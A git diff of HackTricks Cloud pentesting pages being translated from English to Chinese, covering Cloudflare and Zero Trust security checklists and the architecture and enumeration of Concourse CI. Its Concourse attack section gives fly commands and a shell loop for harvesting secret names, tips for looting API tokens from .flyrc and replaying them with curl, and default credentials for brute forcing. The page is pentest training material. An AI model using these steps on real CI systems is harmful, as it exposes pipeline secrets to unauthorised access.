-### Overview +### 概述 -- [ ] Get a feeling of **how much** are the services of the account **used** -- [ ] Find also the **zone ID** and the **account ID** +- [ ] 了解账户 **服务的使用程度** +- [ ] 还要找到 **区域 ID** 和 **账户 ID** -### Analytics +### 分析 -- [ ] In **`Security`** check if there is any **Rate limiting** +- [ ] 在 **`安全`** 中检查是否有 **速率限制** ### DNS -- [ ] Check **interesting** (sensitive?) data in DNS **records** -- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com) -- [ ] Check for web pages that **aren't** **proxied** -- [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address -- [ ] Check that **DNSSEC** is **enabled** -- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs** - - This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings -- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) +- [ ] 检查 DNS **记录** 中的 **有趣**(敏感?)数据 +- [ ] 检查可能包含 **敏感信息** 的 **子域名**,仅基于 **名称**(如 admin173865324.domin.com) +- [ ] 检查 **未被代理** 的网页 +- [ ] 检查可以通过 CNAME 或 IP 地址 **直接访问的代理网页** +- [ ] 检查 **DNSSEC** 是否 **启用** +- [ ] 检查所有 **CNAME** 是否 **使用 CNAME 扁平化** +- 这可能有助于 **隐藏子域名接管漏洞** 并改善加载时间 +- [ ] 检查域名 [**是否易受欺骗**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) -### **Email** +### **电子邮件** TODO @@ -36,91 +36,91 @@ TODO ### SSL/TLS -#### **Overview** +#### **概述** -- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point. -- [ ] The **SSL/TLS Recommender** should be enabled +- [ ] **SSL/TLS 加密** 应该是 **完全** 或 **完全(严格)**。任何其他设置将在某些时候发送 **明文流量**。 +- [ ] **SSL/TLS 推荐器** 应该启用 -#### Edge Certificates +#### 边缘证书 -- [ ] **Always Use HTTPS** should be **enabled** -- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled** -- [ ] **Minimum TLS Version should be 1.2** -- [ ] **TLS 1.3 should be enabled** -- [ ] **Automatic HTTPS Rewrites** should be **enabled** -- [ ] **Certificate Transparency Monitoring** should be **enabled** +- [ ] **始终使用 HTTPS** 应该 **启用** +- [ ] **HTTP 严格传输安全 (HSTS)** 应该 **启用** +- [ ] **最低 TLS 版本应为 1.2** +- [ ] **TLS 1.3 应该启用** +- [ ] **自动 HTTPS 重写** 应该 **启用** +- [ ] **证书透明度监控** 应该 **启用** -### **Security** +### **安全** -- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses. - - The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used. 
-- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used -- [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare -- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections** -- [ ] In the **`Settings`** section: - - [ ] Check that the **`Security Level`** is **medium** or greater - - [ ] Check that the **`Challenge Passage`** is 1 hour at max - - [ ] Check that the **`Browser Integrity Check`** is **enabled** - - [ ] Check that the **`Privacy Pass Support`** is **enabled** +- [ ] 在 **`WAF`** 部分,检查 **防火墙** 和 **速率限制规则是否被使用** 以防止滥用是很有趣的。 +- **`绕过`** 操作将 **禁用 Cloudflare 安全** 功能。它不应该被使用。 +- [ ] 在 **`页面保护`** 部分,如果使用了任何页面,建议检查其是否 **启用** +- [ ] 在 **`API 保护`** 部分,如果在 Cloudflare 中暴露了任何 API,建议检查其是否 **启用** +- [ ] 在 **`DDoS`** 部分,建议启用 **DDoS 保护** +- [ ] 在 **`设置`** 部分: +- [ ] 检查 **`安全级别`** 是否为 **中等** 或更高 +- [ ] 检查 **`挑战通行`** 最多为 1 小时 +- [ ] 检查 **`浏览器完整性检查`** 是否 **启用** +- [ ] 检查 **`隐私通行证支持`** 是否 **启用** -#### **CloudFlare DDoS Protection** +#### **CloudFlare DDoS 保护** -- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access. -- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie. - - If the attack is from a **verified bot**, at least **add a rate limit** to bots. - - If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path. - - You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF. - - Check if **Managed rules** could also help to prevent vulnerability exploitations. - - In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.** -- In DDoS you could **override some rules to make them more restrictive**. -- **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**. 
-- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled -- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events** +- 如果可以,启用 **机器人战斗模式** 或 **超级机器人战斗模式**。如果您保护某个通过编程访问的 API(例如来自 JS 前端页面),您可能无法在不破坏该访问的情况下启用此功能。 +- 在 **WAF**:您可以根据 URL 路径创建 **速率限制** 或对 **已验证的机器人**(速率限制规则),或根据 IP、Cookie、引荐来源等 **阻止访问**。因此,您可以阻止不来自网页或没有 Cookie 的请求。 +- 如果攻击来自 **已验证的机器人**,至少 **添加速率限制** 到机器人。 +- 如果攻击针对 **特定路径**,作为预防机制,在该路径中添加 **速率限制**。 +- 您还可以在 WAF 的 **工具** 中 **白名单** IP 地址、IP 范围、国家或 ASN。 +- 检查 **托管规则** 是否也可以帮助防止漏洞利用。 +- 在 **工具** 部分,您可以 **阻止或对特定 IP 和用户代理发出挑战**。 +- 在 DDoS 中,您可以 **覆盖某些规则以使其更具限制性**。 +- **设置**:将 **安全级别** 设置为 **高**,如果您处于攻击中,则设置为 **正在攻击**,并确保 **浏览器完整性检查已启用**。 +- 在 Cloudflare Domains -> Analytics -> Security -> 检查 **速率限制** 是否启用 +- 在 Cloudflare Domains -> Security -> Events -> 检查 **检测到的恶意事件** -### Access +### 访问 {{#ref}} cloudflare-zero-trust-network.md {{#endref}} -### Speed +### 速度 -_I couldn't find any option related to security_ +_我找不到与安全相关的任何选项_ -### Caching +### 缓存 -- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool** +- [ ] 在 **`配置`** 部分,考虑启用 **CSAM 扫描工具** -### **Workers Routes** +### **Workers 路由** -_You should have already checked_ [_cloudflare workers_](./#workers) +_您应该已经检查过_ [_cloudflare workers_](./#workers) -### Rules +### 规则 TODO -### Network +### 网络 -- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled** -- [ ] **`HTTP/3 (with QUIC)`** should be **enabled** -- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled** +- [ ] 如果 **`HTTP/2`** 已 **启用**,则 **`HTTP/2 到源`** 应该 **启用** +- [ ] **`HTTP/3 (带 QUIC)`** 应该 **启用** +- [ ] 如果 **用户** 的 **隐私** 重要,请确保 **`洋葱路由`** 已 **启用** -### **Traffic** +### **流量** TODO -### Custom Pages +### 自定义页面 -- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode) +- [ ] 当触发与安全相关的错误时(如阻止、速率限制或我正在攻击模式),配置自定义页面是可选的 -### Apps +### 应用 TODO -### Scrape Shield +### 抓取保护 -- [ ] Check **Email Address Obfuscation** is **enabled** -- [ ] Check **Server-side Excludes** is **enabled** +- [ ] 检查 **电子邮件地址模糊化** 是否 **启用** +- [ ] 检查 **服务器端排除** 是否 **启用** ### **Zaraz** @@ -131,7 +131,3 @@ TODO TODO {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md index 491ae7bc1..017a418de 100644 --- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md +++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md @@ -2,43 +2,43 @@ {{#include ../../banners/hacktricks-training.md}} -In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** +在 **Cloudflare Zero Trust Network** 账户中,有一些 **设置和服务** 可以进行配置。在本页面中,我们将 **分析每个部分的安全相关设置:**
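Before walking through each section below, the same review can be driven from the Zero Trust API. A minimal sketch, assuming an API token with Zero Trust/Access read permissions (the account ID and token are placeholders and the `jq` filters are only illustrative):

```bash
ACCOUNT_ID=<account_id>
AUTH="Authorization: Bearer <api_token_with_zero_trust_read>"
BASE="https://api.cloudflare.com/client/v4/accounts/$ACCOUNT_ID"

# Inventory of Access-protected applications, reusable Access groups and any
# long-lived service tokens (check their expiration dates)
curl -s -H "$AUTH" "$BASE/access/apps"           | jq -r '.result[].name'
curl -s -H "$AUTH" "$BASE/access/groups"         | jq -r '.result[].name'
curl -s -H "$AUTH" "$BASE/access/service_tokens" | jq -r '.result[] | "\(.name) expires \(.expires_at)"'
```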
### Analytics -- [ ] Useful to **get to know the environment** +- [ ] 有助于 **了解环境** ### **Gateway** -- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications. - - If used, **policies** could be created to **restrict** the access to malicious sites. - - This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies. +- [ ] 在 **`Policies`** 中,可以生成策略以 **限制** 通过 **DNS**、**网络** 或 **HTTP** 请求谁可以访问应用程序。 +- 如果使用,**策略** 可以被创建以 **限制** 访问恶意网站。 +- 这 **仅在使用网关时相关**,如果不使用,则没有理由创建防御性策略。 ### Access #### Applications -On each application: +在每个应用程序上: -- [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access. - - To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also) -- [ ] Check the **available identity providers** and make sure they **aren't too open** -- [ ] In **`Settings`**: - - [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything) - - [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP. - - [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** +- [ ] 检查 **谁** 可以访问该应用程序的 **Policies**,并确保 **只有** 需要访问该应用程序的 **用户** 可以访问。 +- 要允许访问,将使用 **`Access Groups`**(并且 **还可以设置额外规则**) +- [ ] 检查 **可用的身份提供者**,确保它们 **不太开放** +- [ ] 在 **`Settings`** 中: +- [ ] 检查 **CORS 未启用**(如果启用,检查它是否 **安全**,并且不允许所有内容) +- [ ] Cookies 应具有 **Strict Same-Site** 属性,**HTTP Only** 和 **绑定 cookie** 应在应用程序为 HTTP 时 **启用**。 +- [ ] 考虑启用 **浏览器渲染** 以获得更好的 **保护。更多信息请参见** [**远程浏览器隔离**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**。** #### **Access Groups** -- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow. -- [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**. - - Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary. 
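A quick way to surface the overly-open groups mentioned above is to pull them from the API and look for the very permissive `everyone` include rule. A best-effort sketch (account ID and token are placeholders, and the `jq` filter may need adjusting to the exact response shape):

```bash
curl -s -H "Authorization: Bearer <api_token>" \
  "https://api.cloudflare.com/client/v4/accounts/<account_id>/access/groups" \
  | jq -r '.result[] | select(any(.include[]?; has("everyone"))) | .name'
```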
+- [ ] 检查生成的访问组是否 **正确限制** 了它们应该允许的用户。 +- [ ] 特别重要的是检查 **默认访问组不太开放**(**不允许太多人**),因为 **默认情况下** 该 **组** 中的任何人都将能够 **访问应用程序**。 +- 请注意,可以给 **每个人** 和其他 **非常开放的策略** 赋予 **访问权限**,除非 100% 必要,否则不推荐使用。 #### Service Auth -- [ ] Check that all service tokens **expires in 1 year or less** +- [ ] 检查所有服务令牌 **在 1 年或更短时间内过期** #### Tunnels @@ -50,16 +50,12 @@ TODO ### Logs -- [ ] You could search for **unexpected actions** from users +- [ ] 您可以搜索用户的 **意外操作** ### Settings -- [ ] Check the **plan type** -- [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address** -- [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service +- [ ] 检查 **计划类型** +- [ ] 可以查看 **信用卡持有者姓名**、**最后 4 位数字**、**到期** 日期和 **地址** +- [ ] 建议 **添加用户座位到期** 以移除不真正使用此服务的用户 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/README.md b/src/pentesting-ci-cd/concourse-security/README.md index bcf20facf..72cf53091 100644 --- a/src/pentesting-ci-cd/concourse-security/README.md +++ b/src/pentesting-ci-cd/concourse-security/README.md @@ -2,36 +2,32 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...) +Concourse 允许您 **构建管道** 以在需要时自动运行测试、操作和构建镜像(基于时间,或在发生某些事情时...) -## Concourse Architecture +## Concourse 架构 -Learn how the concourse environment is structured in: +了解 concourse 环境的结构: {{#ref}} concourse-architecture.md {{#endref}} -## Concourse Lab +## Concourse 实验室 -Learn how you can run a concourse environment locally to do your own tests in: +了解如何在本地运行 concourse 环境以进行自己的测试: {{#ref}} concourse-lab-creation.md {{#endref}} -## Enumerate & Attack Concourse +## 枚举与攻击 Concourse -Learn how you can enumerate the concourse environment and abuse it in: +了解如何枚举 concourse 环境并利用它: {{#ref}} concourse-enumeration-and-attacks.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md index d70167906..a454847ef 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md @@ -4,7 +4,7 @@ {{#include ../../banners/hacktricks-training.md}} -[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html) +[**来自Concourse文档的相关数据:**](https://concourse-ci.org/internals.html) ### Architecture @@ -12,31 +12,27 @@ #### ATC: web UI & build scheduler -The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). +ATC是Concourse的核心。它运行**web UI和API**,并负责所有管道**调度**。它**连接到PostgreSQL**,用于存储管道数据(包括构建日志)。 -The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. 
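The web/ATC node also leaks a little information without authentication, which helps fingerprint a deployment before digging in. A small sketch (the URL is a placeholder and the exact fields can vary between versions):

```bash
# Unauthenticated endpoint that typically returns the Concourse "version" and the
# expected "worker_version" of the ATC you are talking to
curl -s http://ci.example.com:8080/api/v1/info
```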
+[checker](https://concourse-ci.org/checker.html)的职责是持续检查资源的新版本。[scheduler](https://concourse-ci.org/scheduler.html)负责为作业调度构建,而[build tracker](https://concourse-ci.org/build-tracker.html)负责运行任何已调度的构建。[garbage collector](https://concourse-ci.org/garbage-collector.html)是用于清理任何未使用或过时对象(如容器和卷)的机制。 #### TSA: worker registration & forwarding -The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). +TSA是一个**定制的SSH服务器**,仅用于安全地**注册**[**workers**](https://concourse-ci.org/internals.html#architecture-worker)与[ATC](https://concourse-ci.org/internals.html#component-atc)。 -The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer. +TSA默认监听端口`2222`,通常与[ATC](https://concourse-ci.org/internals.html#component-atc)共同放置,并位于负载均衡器后面。 -The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). +**TSA通过SSH连接实现CLI,**支持[**这些命令**](https://concourse-ci.org/internals.html#component-tsa)。 #### Workers -In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). +为了执行任务,Concourse必须有一些workers。这些workers通过[TSA](https://concourse-ci.org/internals.html#component-tsa)进行**自我注册**,并运行服务[**Garden**](https://github.com/cloudfoundry-incubator/garden)和[**Baggageclaim**](https://github.com/concourse/baggageclaim)。 -- **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. -- **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. +- **Garden**:这是**容器管理API**,通常通过**HTTP**在**端口7777**上运行。 +- **Baggageclaim**:这是**卷管理API**,通常通过**HTTP**在**端口7788**上运行。 ## References - [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md index 4b778a804..c4b5faf48 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md @@ -4,49 +4,47 @@ {{#include ../../banners/hacktricks-training.md}} -### User Roles & Permissions +### 用户角色与权限 -Concourse comes with five roles: +Concourse 具有五个角色: -- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC. -- **owner**: Team owners can **modify everything within the team**. -- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings. -- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations. -- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines. 
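Roles are pinned per team through the team auth configuration. A sketch of how an owner would assign them with `fly set-team` (team and user names are hypothetical, and each auth connector has its own keys, so check the managing-teams docs for the full schema):

```bash
cat > team-auth.yml <<'EOF'
roles:
- name: owner
  local:
    users: ["ci-admin"]
- name: member
  local:
    users: ["dev-user"]
- name: viewer
  local:
    users: ["auditor"]
EOF

fly -t example set-team -n my-team -c team-auth.yml
fly -t example get-team -n my-team   # confirm which users ended up with which role
```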
+- _Concourse_ **管理员**:此角色仅授予 **主团队**(默认初始 concourse 团队)的所有者。管理员可以 **配置其他团队**(例如:`fly set-team`,`fly destroy-team`...)。此角色的权限无法通过 RBAC 进行影响。 +- **所有者**:团队所有者可以 **修改团队内的所有内容**。 +- **成员**:团队成员可以在 **团队资产** 中 **读取和写入**,但无法修改团队设置。 +- **管道操作员**:管道操作员可以执行 **管道操作**,例如触发构建和固定资源,但无法更新管道配置。 +- **查看者**:团队查看者对团队及其管道具有 **“只读”** 访问权限。 > [!NOTE] -> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) +> 此外,**所有者、成员、管道操作员和查看者的角色权限可以通过配置 RBAC 进行修改**(更具体地说是其操作)。有关更多信息,请阅读:[https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) -Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them. +请注意,Concourse **将管道分组到团队中**。因此,属于某个团队的用户将能够管理这些管道,并且 **可能存在多个团队**。用户可以属于多个团队,并在每个团队中拥有不同的权限。 -### Vars & Credential Manager +### 变量与凭证管理器 -In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\ -[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\ -The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\ -Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`. +在 YAML 配置中,您可以使用语法 `((_source-name_:_secret-path_._secret-field_))` 配置值。\ +[来自文档:](https://concourse-ci.org/vars.html#var-syntax) **source-name 是可选的**,如果省略,将使用 [集群范围的凭证管理器](https://concourse-ci.org/vars.html#cluster-wide-credential-manager),或者可以 [静态提供值](https://concourse-ci.org/vars.html#static-vars)。\ +**可选的 \_secret-field**\_ 指定要读取的获取凭证上的字段。如果省略,凭证管理器可以选择从获取的凭证中读取“默认字段”,如果该字段存在。\ +此外,_**secret-path**_ 和 _**secret-field**_ 如果 **包含特殊字符**(如 `.` 和 `:`),可以用双引号 `"..."` 括起来。例如,`((source:"my.secret"."field:1"))` 将把 _secret-path_ 设置为 `my.secret`,将 _secret-field_ 设置为 `field:1`。 -#### Static Vars - -Static vars can be specified in **tasks steps**: +#### 静态变量 +静态变量可以在 **任务步骤** 中指定: ```yaml - task: unit-1.13 - file: booklit/ci/unit.yml - vars: { tag: 1.13 } +file: booklit/ci/unit.yml +vars: { tag: 1.13 } ``` - Or using the following `fly` **arguments**: -- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`. -- `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`. -- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars. -- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all. 
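As an example, those flags are usually combined when setting a pipeline; a sketch with hypothetical pipeline and var names:

```bash
# -v passes a plain string, -y parses the value as YAML (a boolean here),
# -l loads a whole "name: value" YAML file of vars
fly -t tutorial set-pipeline -p booklit -c pipeline.yml \
  -v tag=1.13 \
  -y run_tests=true \
  -l vars.yml
```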
+- `-v` or `--var` `NAME=VALUE` 将字符串 `VALUE` 设置为变量 `NAME` 的值。 +- `-y` or `--yaml-var` `NAME=VALUE` 将 `VALUE` 解析为 YAML,并将其设置为变量 `NAME` 的值。 +- `-i` or `--instance-var` `NAME=VALUE` 将 `VALUE` 解析为 YAML,并将其设置为实例变量 `NAME` 的值。有关实例变量的更多信息,请参见 [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html)。 +- `-l` or `--load-vars-from` `FILE` 加载 `FILE`,这是一个包含变量名称与值映射的 YAML 文档,并设置所有变量。 #### Credential Management -There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\ -Moreover, Concourse supports different credential managers: +在管道中可以通过不同方式指定 **Credential Manager**,请阅读 [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html)。\ +此外,Concourse 支持不同的凭证管理器: - [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html) - [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html) @@ -59,160 +57,151 @@ Moreover, Concourse supports different credential managers: - [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html) > [!CAUTION] -> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them. +> 请注意,如果您对 Concourse 有某种 **写入访问权限**,您可以创建作业来 **提取这些秘密**,因为 Concourse 需要能够访问它们。 ### Concourse Enumeration -In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file. +为了枚举一个 concourse 环境,您首先需要 **收集有效凭证** 或找到一个 **认证令牌**,可能在 `.flyrc` 配置文件中。 #### Login and Current User enum -- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**: - - `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` -- Get configured **targets**: - - `fly targets` -- Get if the configured **target connection** is still **valid**: - - `fly -t status` -- Get **role** of the user against the indicated target: - - `fly -t userinfo` +- 要登录,您需要知道 **端点**、**团队名称**(默认是 `main`)和 **用户所属的团队**: +- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` +- 获取配置的 **targets**: +- `fly targets` +- 获取配置的 **target 连接**是否仍然 **有效**: +- `fly -t status` +- 获取用户在指定目标下的 **角色**: +- `fly -t userinfo` > [!NOTE] -> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials. 
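If you loot a `.flyrc`, the bearer token inside it can be replayed directly against the ATC REST API instead of going through `fly`. A sketch (the URL and token are placeholders; the endpoints below are the usual ATC routes, adjust if the instance differs):

```bash
cat ~/.flyrc    # each target entry holds the api URL, team and a bearer token value

ATC=https://ci.example.com
TOKEN=<token value copied from .flyrc>

curl -sk -H "Authorization: Bearer $TOKEN" "$ATC/api/v1/user"       # current user, teams and roles
curl -sk -H "Authorization: Bearer $TOKEN" "$ATC/api/v1/teams"      # teams you can see
curl -sk -H "Authorization: Bearer $TOKEN" "$ATC/api/v1/pipelines"  # pipelines across those teams
```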
+> 请注意,**API token** 默认保存在 `$HOME/.flyrc` 中,您在盗取机器时可以在那里找到凭证。 #### Teams & Users -- Get a list of the Teams - - `fly -t teams` -- Get roles inside team - - `fly -t get-team -n ` -- Get a list of users - - `fly -t active-users` +- 获取团队列表 +- `fly -t teams` +- 获取团队内的角色 +- `fly -t get-team -n ` +- 获取用户列表 +- `fly -t active-users` #### Pipelines -- **List** pipelines: - - `fly -t pipelines -a` -- **Get** pipeline yaml (**sensitive information** might be found in the definition): - - `fly -t get-pipeline -p ` -- Get all pipeline **config declared vars** - - `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` -- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them): - +- **列出** 管道: +- `fly -t pipelines -a` +- **获取** 管道 yaml(**敏感信息**可能在定义中找到): +- `fly -t get-pipeline -p ` +- 获取所有管道 **配置声明的变量** +- `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` +- 获取所有 **管道使用的秘密名称**(如果您可以创建/修改作业或劫持容器,您可以提取它们): ```bash rm /tmp/secrets.txt; for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do - echo $pipename; - fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; - echo ""; +echo $pipename; +fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; +echo ""; done echo "" echo "ALL SECRETS" cat /tmp/secrets.txt | sort | uniq rm /tmp/secrets.txt ``` +#### 容器与工作者 -#### Containers & Workers +- 列出 **workers**: +- `fly -t workers` +- 列出 **containers**: +- `fly -t containers` +- 列出 **builds** (查看正在运行的内容): +- `fly -t builds` -- List **workers**: - - `fly -t workers` -- List **containers**: - - `fly -t containers` -- List **builds** (to see what is running): - - `fly -t builds` +### Concourse 攻击 -### Concourse Attacks - -#### Credentials Brute-Force +#### 凭证暴力破解 - admin:admin - test:test -#### Secrets and params enumeration +#### 秘密和参数枚举 -In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them. 
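Those names only turn into secrets once you know where the credential manager keeps them. A sketch of the lookup convention, assuming the cluster-wide Vault manager with its default `/concourse` prefix and placeholder team/pipeline/secret names (SSM, Secrets Manager and CredHub scope lookups by team and pipeline in an analogous way):

```bash
TEAM=main; PIPELINE=mypipe                      # placeholders
for ref in super.secret docker.password; do     # ((source.field)) names gathered above
  var=${ref%%.*}       # the part before the dot is the secret path, the rest is the field
  echo "/concourse/$TEAM/$PIPELINE/$var"        # per-pipeline path, tried first
  echo "/concourse/$TEAM/$var"                  # team-level fallback
done
```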
